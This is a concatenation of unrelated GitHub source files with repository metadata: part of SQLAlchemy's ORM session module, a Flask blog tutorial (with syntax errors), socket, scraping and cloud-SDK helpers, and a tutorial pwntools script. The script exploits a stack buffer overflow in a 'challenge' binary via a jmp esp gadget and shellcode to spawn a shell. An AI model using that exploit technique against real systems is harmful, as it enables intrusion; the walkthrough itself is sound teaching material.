if self.dispatch.after_attach:
self.dispatch.after_attach(self, state.obj())
def __contains__(self, instance):
"""Return True if the instance is associated with this session.
The instance may be pending or persistent within the Session for a
result of True.
"""
try:
state = attributes.instance_state(instance)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
return self._contains_state(state)
def __iter__(self):
"""Iterate over all pending or persistent instances within this
Session.
"""
return iter(list(self._new.values()) + list(self.identity_map.values()))
def _contains_state(self, state):
return state in self._new or self.identity_map.contains_state(state)
def flush(self, objects=None):
"""Flush all the object changes to the database.
Writes out all pending object creations, deletions and modifications
to the database as INSERTs, DELETEs, UPDATEs, etc. Operations are
automatically ordered by the Session's unit of work dependency
solver.
Database operations will be issued in the current transactional
context and do not affect the state of the transaction, unless an
error occurs, in which case the entire transaction is rolled back.
You may flush() as often as you like within a transaction to move
changes from Python to the database's transaction buffer.
For ``autocommit`` Sessions with no active manual transaction, flush()
will create a transaction on the fly that surrounds the entire set of
operations int the flush.
:param objects: Optional; restricts the flush operation to operate
only on elements that are in the given collection.
This feature is for an extremely narrow set of use cases where
particular objects may need to be operated upon before the
full flush() occurs. It is not intended for general use.
"""
if self._flushing:
raise sa_exc.InvalidRequestError("Session is already flushing")
if self._is_clean():
return
try:
self._flushing = True
self._flush(objects)
finally:
self._flushing = False
def _flush_warning(self, method):
util.warn(
"Usage of the '%s' operation is not currently supported "
"within the execution stage of the flush process. "
"Results may not be consistent. Consider using alternative "
"event listeners or connection-level operations instead."
% method)
def _is_clean(self):
return not self.identity_map.check_modified() and \
not self._deleted and \
not self._new
def _flush(self, objects=None):
dirty = self._dirty_states
if not dirty and not self._deleted and not self._new:
self.identity_map._modified.clear()
return
flush_context = UOWTransaction(self)
if self.dispatch.before_flush:
self.dispatch.before_flush(self, flush_context, objects)
# re-establish "dirty states" in case the listeners
# added
dirty = self._dirty_states
deleted = set(self._deleted)
new = set(self._new)
dirty = set(dirty).difference(deleted)
# create the set of all objects we want to operate upon
if objects:
# specific list passed in
objset = set()
for o in objects:
try:
state = attributes.instance_state(o)
except exc.NO_STATE:
raise exc.UnmappedInstanceError(o)
objset.add(state)
else:
objset = None
# store objects whose fate has been decided
processed = set()
# put all saves/updates into the flush context. detect top-level
# orphans and throw them into deleted.
if objset:
proc = new.union(dirty).intersection(objset).difference(deleted)
else:
proc = new.union(dirty).difference(deleted)
for state in proc:
is_orphan = (
_state_mapper(state)._is_orphan(state) and state.has_identity)
flush_context.register_object(state, isdelete=is_orphan)
processed.add(state)
# put all remaining deletes into the flush context.
if objset:
proc = deleted.intersection(objset).difference(processed)
else:
proc = deleted.difference(processed)
for state in proc:
flush_context.register_object(state, isdelete=True)
if not flush_context.has_work:
return
flush_context.transaction = transaction = self.begin(
subtransactions=True)
try:
self._warn_on_events = True
try:
flush_context.execute()
finally:
self._warn_on_events = False
self.dispatch.after_flush(self, flush_context)
flush_context.finalize_flush_changes()
if not objects and self.identity_map._modified:
len_ = len(self.identity_map._modified)
statelib.InstanceState._commit_all_states(
[(state, state.dict) for state in
self.identity_map._modified],
instance_dict=self.identity_map)
util.warn("Attribute history events accumulated on %d "
"previously clean instances "
"within inner-flush event handlers have been reset, "
"and will not result in database updates. "
"Consider using set_committed_value() within "
"inner-flush event handlers to avoid this warning."
% len_)
# useful assertions:
#if not objects:
# assert not self.identity_map._modified
#else:
# assert self.identity_map._modified == \
# self.identity_map._modified.difference(objects)
self.dispatch.after_flush_postexec(self, flush_context)
transaction.commit()
except:
with util.safe_reraise():
transaction.rollback(_capture_exception=True)
def is_modified(self, instance, include_collections=True,
passive=True):
"""Return ``True`` if the given instance has locally
modified attributes.
This method retrieves the history for each instrumented
attribute on the instance and performs a comparison of the current
value to its previously committed value, if any.
It is in effect a more expensive and accurate
version of checking for the given instance in the
:attr:`.Session.dirty` collection; a full test for
each attribute's net "dirty" status is performed.
E.g.::
return session.is_modified(someobject)
.. versionchanged:: 0.8
When using SQLAlchemy 0.7 and earlier, the ``passive``
flag should **always** be explicitly set to ``True``,
else SQL loads/autoflushes may proceed which can affect
the modified state itself:
``session.is_modified(someobject, passive=True)``\ .
In 0.8 and above, the behavior is corrected and
this flag is ignored.
A few caveats to this method apply:
* Instances present in the :attr:`.Session.dirty` collection may report
``False`` when tested with this method. This is because
the object may have received change events via attribute
mutation, thus placing it in :attr:`.Session.dirty`,
but ultimately the state is the same as that loaded from
the database, resulting in no net change here.
* Scalar attributes may not have recorded the previously set
value when a new value was applied, if the attribute was not loaded,
or was expired, at the time the new value was received - in these
cases, the attribute is assumed to have a change, even if there is
ultimately no net change against its database value. SQLAlchemy in
most cases does not need the "old" value when a set event occurs, so
it skips the expense of a SQL call if the old value isn't present,
based on the assumption that an UPDATE of the scalar value is
usually needed, and in those few cases where it isn't, is less
expensive on average than issuing a defensive SELECT.
The "old" value is fetched unconditionally upon set only if the
attribute container has the ``active_history`` flag set to ``True``.
This flag is set typically for primary key attributes and scalar
object references that are not a simple many-to-one. To set this
flag for any arbitrary mapped column, use the ``active_history``
argument with :func:`.column_property`.
:param instance: mapped instance to be tested for pending changes.
:param include_collections: Indicates if multivalued collections
should be included in the operation. Setting this to ``False`` is a
way to detect only local-column based properties (i.e. scalar columns
or many-to-one foreign keys) that would result in an UPDATE for this
instance upon flush.
:param passive:
.. versionchanged:: 0.8
Ignored for backwards compatibility.
When using SQLAlchemy 0.7 and earlier, this flag should always
be set to ``True``.
"""
state = object_state(instance)
if not state.modified:
return False
dict_ = state.dict
for attr in state.manager.attributes:
if \
(
not include_collections and
hasattr(attr.impl, 'get_collection')
) or not hasattr(attr.impl, 'get_history'):
continue
(added, unchanged, deleted) = \
attr.impl.get_history(state, dict_,
passive=attributes.NO_CHANGE)
if added or deleted:
return True
else:
return False
@property
def is_active(self):
"""True if this :class:`.Session` is in "transaction mode" and
is not in "partial rollback" state.
The :class:`.Session` in its default mode of ``autocommit=False``
is essentially always in "transaction mode", in that a
:class:`.SessionTransaction` is associated with it as soon as
it is instantiated. This :class:`.SessionTransaction` is immediately
replaced with a new one as soon as it is ended, due to a rollback,
commit, or close operation.
"Transaction mode" does *not* indicate whether
or not actual database connection resources are in use; the
:class:`.SessionTransaction` object coordinates among zero or more
actual database transactions, and starts out with none, accumulating
individual DBAPI connections as different data sources are used
within its scope. The best way to track when a particular
:class:`.Session` has actually begun to use DBAPI resources is to
implement a listener using the :meth:`.SessionEvents.after_begin`
method, which will deliver both the :class:`.Session` as well as the
target :class:`.Connection` to a user-defined event listener.
The "partial rollback" state refers to when an "inner" transaction,
typically used during a flush, encounters an error and emits a
rollback of the DBAPI connection. At this point, the
:class:`.Session` is in "partial rollback" and awaits for the user to
call :meth:`.Session.rollback`, in order to close out the
transaction stack. It is in this "partial rollback" period that the
:attr:`.is_active` flag returns False. After the call to
:meth:`.Session.rollback`, the :class:`.SessionTransaction` is replaced
with a new one and :attr:`.is_active` returns ``True`` again.
When a :class:`.Session` is used in ``autocommit=True`` mode, the
:class:`.SessionTransaction` is only instantiated within the scope
of a flush call, or when :meth:`.Session.begin` is called. So
:attr:`.is_active` will always be ``False`` outside of a flush or
:meth:`.Session.begin` block in this mode, and will be ``True``
within the :meth:`.Session.begin` block as long as it doesn't enter
"partial rollback" state.
From all the above, it follows that the only purpose to this flag is
for application frameworks that wish to detect is a "rollback" is
necessary within a generic error handling routine, for
:class:`.Session` objects that would otherwise be in
"partial rollback" mode. In a typical integration case, this is also
not necessary as it is standard practice to emit
:meth:`.Session.rollback` unconditionally within the outermost
exception catch.
To track the transactional state of a :class:`.Session` fully,
use event listeners, primarily the :meth:`.SessionEvents.after_begin`,
:meth:`.SessionEvents.after_commit`,
:meth:`.SessionEvents.after_rollback` and related events.
"""
return self.transaction and self.transaction.is_active
identity_map = None
"""A mapping of object identities to objects themselves.
Iterating through ``Session.identity_map.values()`` provides
access to the full set of persistent objects (i.e., those
that have row identity) currently in the session.
See also:
:func:`.identity_key` - operations involving identity keys.
"""
@property
def _dirty_states(self):
"""The set of all persistent states considered dirty.
This method returns all states that were modified including
those that were possibly deleted.
"""
return self.identity_map._dirty_states()
@property
def dirty(self):
"""The set of all persistent instances considered dirty.
E.g.::
some_mapped_object in session.dirty
Instances are considered dirty when they were modified but not
deleted.
Note that this 'dirty' calculation is 'optimistic'; most
attribute-setting or collection modification operations will
mark an instance as 'dirty' and place it in this set, even if
there is no net change to the attribute's value. At flush
time, the value of each attribute is compared to its
previously saved value, and if there's no net change, no SQL
operation will occur (this is a more expensive operation so
it's only done at flush time).
To check if an instance has actionable net changes to its
attributes, use the :meth:`.Session.is_modified` method.
"""
return util.IdentitySet(
[state.obj()
for state in self._dirty_states
if state not in self._deleted])
@property
def deleted(self):
"The set of all instances marked as 'deleted' within this ``Session``"
return util.IdentitySet(list(self._deleted.values()))
@property
def new(self):
"The set of all instances marked as 'new' within this ``Session``."
return util.IdentitySet(list(self._new.values()))
class sessionmaker(_SessionClassMethods):
"""A configurable :class:`.Session` factory.
The :class:`.sessionmaker` factory generates new
:class:`.Session` objects when called, creating them given
the configurational arguments established here.
e.g.::
# global scope
Session = sessionmaker(autoflush=False)
# later, in a local scope, create and use a session:
sess = Session()
Any keyword arguments sent to the constructor itself will override the
"configured" keywords::
Session = sessionmaker()
# bind an individual session to a connection
sess = Session(bind=connection)
The class also includes a method :meth:`.configure`, which can
be used to specify additional keyword arguments to the factory, which
will take effect for subsequent :class:`.Session` objects generated.
This is usually used to associate one or more :class:`.Engine` objects
with an existing :class:`.sessionmaker` factory before it is first
used::
# application starts
Session = sessionmaker()
# ... later
engine = create_engine('sqlite:///foo.db')
Session.configure(bind=engine)
sess = Session()
.. seealso:
:ref:`session_getting` - introductory text on creating
sessions using :class:`.sessionmaker`.
"""
def __init__(self, bind=None, class_=Session, autoflush=True,
autocommit=False,
expire_on_commit=True,
info=None, **kw):
"""Construct a new :class:`.sessionmaker`.
All arguments here except for ``class_`` correspond to arguments
accepted by :class:`.Session` directly. See the
:meth:`.Session.__init__` docstring for more details on parameters.
:param bind: a :class:`.Engine` or other :class:`.Connectable` with
which newly created :class:`.Session` objects will be associated.
:param class_: class to use in order to create new :class:`.Session`
objects. Defaults to :class:`.Session`.
:param autoflush: The autoflush setting to use with newly created
:class:`.Session` objects.
:param autocommit: The autocommit setting to use with newly created
:class:`.Session` objects.
:param expire_on_commit=True: the expire_on_commit setting to use
with newly created :class:`.Session` objects.
:param info: optional dictionary of information that will be available
via :attr:`.Session.info`. Note this dictionary is *updated*, not
replaced, when the ``info`` parameter is specified to the specific
:class:`.Session` construction operation.
.. versionadded:: 0.9.0
:param \**kw: all other keyword arguments are passed to the constructor
of newly created :class:`.Session` objects.
"""
kw['bind'] = bind
kw['autoflush'] = autoflush
kw['autocommit'] = autocommit
kw['expire_on_commit'] = expire_on_commit
kw['info'] = info
self.kw = kw
# make our own subclass of the given class, so that
# events can be associated with it specifically.
self.class_ = type(class_.__name__, (class_,), {})
def __call__(self, **local_kw):
"""Produce a new :class:`.Session` object using the configuration
established in this :class:`.sessionmaker`.
In Python, the ``__call__`` method is invoked on an object when
it is "called" in the same way as a function::
Session = sessionmaker()
session = Session() # invokes sessionmaker.__call__()
"""
for k, v in self.kw.items():
if k == 'info' and 'info' in local_kw:
d = v.copy()
d.update(local_kw['info'])
local_kw['info'] = d
else:
local_kw.setdefault(k, v)
return self.class_(**local_kw)
def configure(self, **new_kw):
"""(Re)configure the arguments for this sessionmaker.
e.g.::
Session = sessionmaker()
Session.configure(bind=create_engine('sqlite://'))
"""
self.kw.update(new_kw)
def __repr__(self):
return "%s(class_=%r%s)" % (
self.__class__.__name__,
self.class_.__name__,
", ".join("%s=%r" % (k, v) for k, v in self.kw.items())
)
def make_transient(instance):
"""Make the given instance 'transient'.
This will remove its association with any
session and additionally will remove its "identity key",
such that it's as though the object were newly constructed,
except retaining its values. It also resets the
"deleted" flag on the state if this object
had been explicitly deleted by its session.
Attributes which were "expired" or deferred at the
instance level are reverted to undefined, and
will not trigger any loads.
"""
state = attributes.instance_state(instance)
s = _state_session(state)
if s:
s._expunge_state(state)
# remove expired state and
# deferred callables
state.callables.clear()
if state.key:
del state.key
if state.deleted:
del state.deleted
def object_session(instance):
"""Return the ``Session`` to which instance belongs.
If the instance is not a mapped instance, an error is raised.
"""
try:
return _state_session(attributes.instance_state(instance))
except exc.NO_STATE:
raise exc.UnmappedInstanceError(instance)
_new_sessionid = util.counter()
|
{
"content_hash": "68850ecd6862f1912c2a4035dadcb2fd",
"timestamp": "",
"source": "github",
"line_count": 2359,
"max_line_length": 83,
"avg_line_length": 39.45485375158966,
"alnum_prop": 0.6021015536025098,
"repo_name": "alex/sqlalchemy",
"id": "21768626876478dfe6bd6d05b9c20b943ff159f3",
"size": "93306",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "lib/sqlalchemy/orm/session.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "45039"
},
{
"name": "CSS",
"bytes": "8431"
},
{
"name": "JavaScript",
"bytes": "244"
},
{
"name": "Python",
"bytes": "7479025"
}
],
"symlink_target": ""
}
|
from hashlib import md5
from app import app
from app import oid,lm,db
from flask import render_template, flash, redirect, session, url_for, request, g
from flask.ext.login import login_user, logout_user, current_user, login_required
from forms import LoginForm
from models import User, ROLE_USER, ROLE_ADMIN
from flask import render_template
from forms import *
@app.route('/')
@app.route('/index/')
@login_required
def index():
user = g.user
posts = [
{'author':{'nickname':'John'},
'body':'Beautiful day in Portland!'
},
{'author':{'nickname':'Susan'},
'body':'Think in java'
}
]
return render_template(
'index.html',
title = 'Home',
user = user,
posts = posts,
)
@app.route('/logout/')
def logout():
logout_user()
return redirect(url_for('index'))
@app.before_request
def before_request():
g.user = current_user
if g.user.is_authenticated():
g.user.last_seen = datetime.utcnow()
db.session.add(g.user)
db.session.commit()
@app.route('/login/',methods = ['GET','POST'])
@oid.loginhandler
def login():
if g.user is not None and g.user.is_authenticated():
return redirect(url_for('index'))
form = LoginForm()
if form.validate_on_submit():
session['remember_me'] = form.remember_me.data
#flash('Login requested for OpenID="'+form.openid.data+'" remberme :'+str(form.remember_me.data))
return oid.try_login(form.openid.data,ask_for = ['nickname','email'])
return render_template('login.html',
title = 'SignIn',
form = form,
providers = app.config['OPENID_PROVIDERS'])
@lm.user_loader
def load_user(id):
return User.query.get(int(id))
@app.route('/edit/',methods = ['GET','POST'])
@login_required
def edit():
form = EditForm()
if form.validate_on_submit():
g.user.nickname = form.nickname.data
g.user.about_me = from.about_me.data
db.session.add(g.user)
db.session.commit()
flash('Your changes have be saved')
return redirect(url_for('edit'))
else:
form.nickname.data = g.user.nickname
form.about_me.data = g.about.me
return render_template('edit.html',
form = form,
)
@oid.after_login
def after_login(resp):
if resp.email is None or resp.email == "":
flash('Invalid login.Please try again.')
redirect(url_for('login'))
user = User.query.filter_by(email = resp.email).first()
if user is None:
nickname = resp.nickname
if nickname is None or nickname =="":
nickname = resp.email.split('@')[0]
user = User(nickname = nickname,email = resp.email,role = ROLE_USER)
db.session.add(user)
db.session.commit()
remember_me = False
if 'remember_me' in session:
remember_me = session['remember_me']
session.pop('remember_me',None)
login_user(user,remember = remember_me)
return redirect(request.args.get('next') or url_for('index'))
@app.route('/user/<nickname>')
@login_required
def user(nickname):
user = User.query.filter_by(nickname = nickname).first()
if user == None:
flash('不存在用户:'+nickname+'!')
return redirect(url_for('index'))
posts = [
{'author':user,
'body':'Beautiful day in Portland!'
},
{'author':user,
'body':'Think in java'
}
]
return render_template(
'user.html',
user = user,
posts = posts,
)
|
{
"content_hash": "d33ae6e3fe856aee3afc2f1a1d308944",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 99,
"avg_line_length": 24,
"alnum_prop": 0.6806615776081425,
"repo_name": "youxun/learning",
"id": "b35881163ffa73eccafc5b64006e1a0850338ffd",
"size": "3176",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7776"
}
],
"symlink_target": ""
}
|
from pwn import *
# Create an instance of the process to talk to
io = gdb.debug('./challenge')
# Attach a debugger to the process so that we can step through
pause()
# Load a copy of the binary so that we can find a JMP ESP
binary = ELF('./challenge')
# Assemble the byte sequence for 'jmp esp' so we can search for it
jmp_esp = asm('jmp esp')
jmp_esp = binary.search(jmp_esp).next()
log.info("Found jmp esp at %#x" % jmp_esp)
# Overflow the buffer with a cyclic pattern to make it easy to find offsets
#
# If we let the program crash with just the pattern as input, the register
# state will look something like this:
#
# EBP 0x6161616b ('kaaa')
# *ESP 0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...'
# *EIP 0x6161616c ('laaa')
crash = False
if crash:
pattern = cyclic(512)
io.sendline(pattern)
pause()
sys.exit()
# Fill out the buffer until where we control EIP
exploit = cyclic(cyclic_find(0x6161616c))
# Fill the spot we control EIP with a 'jmp eip'
exploit += pack(jmp_esp)
# Add our shellcode
exploit += asm(shellcraft.sh())
# gets() waits for a newline
io.sendline(exploit)
# Enjoy our shell
io.interactive()
|
{
"content_hash": "6f45950e5eab83848a05c54d206b588b",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 75,
"avg_line_length": 24.29787234042553,
"alnum_prop": 0.702276707530648,
"repo_name": "idkwim/tutorial",
"id": "aad25fc962c44aa14811b3b994922e5295958a07",
"size": "1188",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "walkthrough/buffer-overflow-basic/exploit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "669"
},
{
"name": "Makefile",
"bytes": "257"
},
{
"name": "Python",
"bytes": "5275"
}
],
"symlink_target": ""
}
|
import socket #for sockets
import sys #for exit
try:
#create an AF_INET, STREAM socket (TCP)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print 'Failed to create socket. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
print 'Socket Created'
host = 'www.google.com'
port = 80
try:
remote_ip = socket.gethostbyname( host )
except socket.gaierror:
#could not resolve
print 'Hostname could not be resolved. Exiting'
sys.exit()
print 'Ip address of ' + host + ' is ' + remote_ip
#Connect to remote server
s.connect((remote_ip , port))
print 'Socket Connected to ' + host + ' on ip ' + remote_ip
|
{
"content_hash": "4b401cd12d455409113d72e223803a9f",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 96,
"avg_line_length": 24.310344827586206,
"alnum_prop": 0.649645390070922,
"repo_name": "janusnic/21v-python",
"id": "812fe4d95ab2dd4e1f0bc7753fab675cf06d9260",
"size": "705",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "unit_18/client/c4.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "369"
},
{
"name": "Python",
"bytes": "990972"
},
{
"name": "SQLPL",
"bytes": "147"
}
],
"symlink_target": ""
}
|
import warnings
from tencentcloud.common.abstract_model import AbstractModel
class CompareMetricsData(AbstractModel):
"""结构化对比指标(准确率/召回率)数据
"""
def __init__(self):
r"""
:param ShortStructAccuracy: 短文准确率
:type ShortStructAccuracy: str
:param ShortStructRecall: 短文召回率
:type ShortStructRecall: str
:param LongStructAccuracy: 长文结构化准确率
:type LongStructAccuracy: str
:param LongStructRecall: 长文结构化召回率
:type LongStructRecall: str
:param LongContentAccuracy: 长文提取准确率
:type LongContentAccuracy: str
:param LongContentRecall: 长文提取召回率
:type LongContentRecall: str
"""
self.ShortStructAccuracy = None
self.ShortStructRecall = None
self.LongStructAccuracy = None
self.LongStructRecall = None
self.LongContentAccuracy = None
self.LongContentRecall = None
def _deserialize(self, params):
self.ShortStructAccuracy = params.get("ShortStructAccuracy")
self.ShortStructRecall = params.get("ShortStructRecall")
self.LongStructAccuracy = params.get("LongStructAccuracy")
self.LongStructRecall = params.get("LongStructRecall")
self.LongContentAccuracy = params.get("LongContentAccuracy")
self.LongContentRecall = params.get("LongContentRecall")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class CreateStructureTaskRequest(AbstractModel):
"""CreateStructureTask请求参数结构体
"""
def __init__(self):
r"""
:param PolicyId: 保单号
:type PolicyId: str
:param CustomerId: 客户号
:type CustomerId: str
:param CustomerName: 客户姓名
:type CustomerName: str
:param TaskType: 文件类型,目前只支持体检报告类型,对应的值为:HealthReport
:type TaskType: str
:param Year: 报告年份
:type Year: str
:param FileList: 报告文件上传的地址列表,需按顺序排列。如果使用ImageList参数,置为空数组即可
:type FileList: list of str
:param InsuranceTypes: 险种,如果是体检报告类型,此参数是必填,类型说明如下:
CriticalDiseaseInsurance:重疾险
LifeInsurance:寿险
AccidentInsurance:意外险
:type InsuranceTypes: list of str
:param ImageList: 报告上传的图片内容数组,图片内容采用base64编码,需按顺序排列
:type ImageList: list of str
"""
self.PolicyId = None
self.CustomerId = None
self.CustomerName = None
self.TaskType = None
self.Year = None
self.FileList = None
self.InsuranceTypes = None
self.ImageList = None
def _deserialize(self, params):
self.PolicyId = params.get("PolicyId")
self.CustomerId = params.get("CustomerId")
self.CustomerName = params.get("CustomerName")
self.TaskType = params.get("TaskType")
self.Year = params.get("Year")
self.FileList = params.get("FileList")
self.InsuranceTypes = params.get("InsuranceTypes")
self.ImageList = params.get("ImageList")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class CreateStructureTaskResponse(AbstractModel):
"""CreateStructureTask返回参数结构体
"""
def __init__(self):
r"""
:param TaskId: 本次结构化任务的ID
:type TaskId: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.TaskId = None
self.RequestId = None
def _deserialize(self, params):
self.TaskId = params.get("TaskId")
self.RequestId = params.get("RequestId")
class DescribeStructCompareDataRequest(AbstractModel):
"""DescribeStructCompareData请求参数结构体
"""
def __init__(self):
r"""
:param TaskId: 结构化任务ID
:type TaskId: str
"""
self.TaskId = None
def _deserialize(self, params):
self.TaskId = params.get("TaskId")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class DescribeStructCompareDataResponse(AbstractModel):
"""DescribeStructCompareData返回参数结构体
"""
def __init__(self):
r"""
:param PolicyId: 保单号
:type PolicyId: str
:param TaskId: 结构化任务ID
:type TaskId: str
:param CustomerId: 客户号
:type CustomerId: str
:param CustomerName: 客户姓名
:type CustomerName: str
:param ReviewTime: 复核时间
:type ReviewTime: str
:param MachineResult: 算法识别结果
:type MachineResult: str
:param ManualResult: 人工复核结果
:type ManualResult: str
:param Metrics: 结构化对比指标数据
:type Metrics: :class:`tencentcloud.cii.v20201210.models.CompareMetricsData`
:param NewItems: 新增项
:type NewItems: str
:param ModifyItems: 修改项
:type ModifyItems: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.PolicyId = None
self.TaskId = None
self.CustomerId = None
self.CustomerName = None
self.ReviewTime = None
self.MachineResult = None
self.ManualResult = None
self.Metrics = None
self.NewItems = None
self.ModifyItems = None
self.RequestId = None
def _deserialize(self, params):
self.PolicyId = params.get("PolicyId")
self.TaskId = params.get("TaskId")
self.CustomerId = params.get("CustomerId")
self.CustomerName = params.get("CustomerName")
self.ReviewTime = params.get("ReviewTime")
self.MachineResult = params.get("MachineResult")
self.ManualResult = params.get("ManualResult")
if params.get("Metrics") is not None:
self.Metrics = CompareMetricsData()
self.Metrics._deserialize(params.get("Metrics"))
self.NewItems = params.get("NewItems")
self.ModifyItems = params.get("ModifyItems")
self.RequestId = params.get("RequestId")
class DescribeStructureTaskResultRequest(AbstractModel):
"""DescribeStructureTaskResult请求参数结构体
"""
def __init__(self):
r"""
:param TaskId: 结构化任务ID
:type TaskId: str
"""
self.TaskId = None
def _deserialize(self, params):
self.TaskId = params.get("TaskId")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class DescribeStructureTaskResultResponse(AbstractModel):
"""DescribeStructureTaskResult返回参数结构体
"""
def __init__(self):
r"""
:param Status: 结果状态:
0:返回成功
1:结果未生成
2:结果生成失败
:type Status: int
:param Results: 结构化识别结果数组,每个数组元素对应一个图片的结构化结果,顺序和输入参数的ImageList或FileList对应。
注意:此字段可能返回 null,表示取不到有效值。
:type Results: list of ResultObject
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.Status = None
self.Results = None
self.RequestId = None
def _deserialize(self, params):
self.Status = params.get("Status")
if params.get("Results") is not None:
self.Results = []
for item in params.get("Results"):
obj = ResultObject()
obj._deserialize(item)
self.Results.append(obj)
self.RequestId = params.get("RequestId")
class ResultObject(AbstractModel):
"""用于返回结构化任务结果
"""
def __init__(self):
r"""
:param Quality: 图片质量分
:type Quality: float
:param StructureResult: 由结构化算法结构化json转换的字符串,具体协议参见算法结构化结果协议
:type StructureResult: str
"""
self.Quality = None
self.StructureResult = None
def _deserialize(self, params):
self.Quality = params.get("Quality")
self.StructureResult = params.get("StructureResult")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
|
{
"content_hash": "e6db112d6b87cf43a0c9cda7f565e650",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 84,
"avg_line_length": 30.198630136986303,
"alnum_prop": 0.6085280108868224,
"repo_name": "tzpBingo/github-trending",
"id": "8f811079e926991844f47ad5a603f72f52e8c7fe",
"size": "10500",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "codespace/python/tencentcloud/cii/v20201210/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "11470"
},
{
"name": "HTML",
"bytes": "1543"
},
{
"name": "Python",
"bytes": "49985109"
},
{
"name": "Shell",
"bytes": "18039"
}
],
"symlink_target": ""
}
|
import requests,sys
from bs4 import BeautifulSoup
from SenseCells.tts import tts
from GreyMatter.utils import clean_msg
# Google News
fixed_url = 'https://news.google.com/'
news_headlines_list = []
news_details_list = []
r = requests.get(fixed_url)
data = r.text
soup = BeautifulSoup(data, "html.parser")
for news_body in soup.find_all("td", "esc-layout-article-cell"):
title = news_body.find("span", "titletext")
detail = news_body.find("div", "esc-lead-snippet-wrapper")
if title is not None:
for span in title:
news_headlines_list.append(span)
# TBD - add news details as well
#news_headlines_list_small = [element.lower().replace("(", "").replace(")", "").replace("'", "") for element in news_headlines_list]
#news_details_list_small = [element.lower().replace("(", "").replace(")", "").replace("'", "") for element in news_details_list]
#news_dictionary = dict(zip(news_headlines_list_small, news_details_list_small))
def news_reader():
for value in news_headlines_list:
tts('Headline, ' + clean_msg(value).encode('utf8'))
#tts('News, ' + value)
|
{
"content_hash": "9ce0f7893b4eebc776ea4f5992b85960",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 132,
"avg_line_length": 35.5625,
"alnum_prop": 0.6511423550087874,
"repo_name": "sjsucohort6/amigo-chatbot",
"id": "9443cdfcabaff01c94d20ac4c416559b77f576d9",
"size": "1138",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ria/GreyMatter/news_reader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "7026"
},
{
"name": "Java",
"bytes": "245483"
},
{
"name": "JavaScript",
"bytes": "2415"
},
{
"name": "Python",
"bytes": "30505"
},
{
"name": "Shell",
"bytes": "35959"
},
{
"name": "Thrift",
"bytes": "334"
}
],
"symlink_target": ""
}
|
from couchdbkit import Consumer
def get_recent_changes(db, limit=500):
c = Consumer(db)
changes = c.fetch(limit=limit, descending=True, include_docs=True)['results']
for row in changes:
yield {
'id':row['id'],
'rev': row['changes'][0]['rev'],
'domain': row['doc'].get('domain', '[no domain]'),
'doc_type': row['doc'].get('doc_type', '[no doc_type]'),
}
|
{
"content_hash": "263d61e097d44634c3a35a6a4fb85324",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 81,
"avg_line_length": 33.15384615384615,
"alnum_prop": 0.5382830626450116,
"repo_name": "gmimano/commcaretest",
"id": "98e5ef52b05b50fa7236eca77a6d5f7d78d354e3",
"size": "431",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "corehq/apps/hqadmin/history.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "282577"
},
{
"name": "JavaScript",
"bytes": "2731012"
},
{
"name": "Python",
"bytes": "4738450"
},
{
"name": "Shell",
"bytes": "22454"
}
],
"symlink_target": ""
}
|
__author__ = 'aobrien'
"""This module incorporates email sending using mailgun."""
import os
import requests
import config
# Enter the domain associated with your Mailgun account here
DOMAIN = os.getenv('MAILGUN_DOMAIN')
# Enter your Mailgun API Key here
API_KEY = os.getenv('MAILGUN_API_KEY')
def send_simple_message(from_email, to_list, subject, message, from_name=None):
"""
Parameters
----------
from_email : str
A string specify the email address of sender (e.g., 'admin@example.com').
to_list : list of strings
A list of strings containing recipient email addresses.
subject : str
A string specifying subject.
message : str
A string containing the body of the email.
from_name: str (optional)
A string specifying the name of the sender.
"""
FROM_FIELD = build_sender(from_email, from_name)
return requests.post(
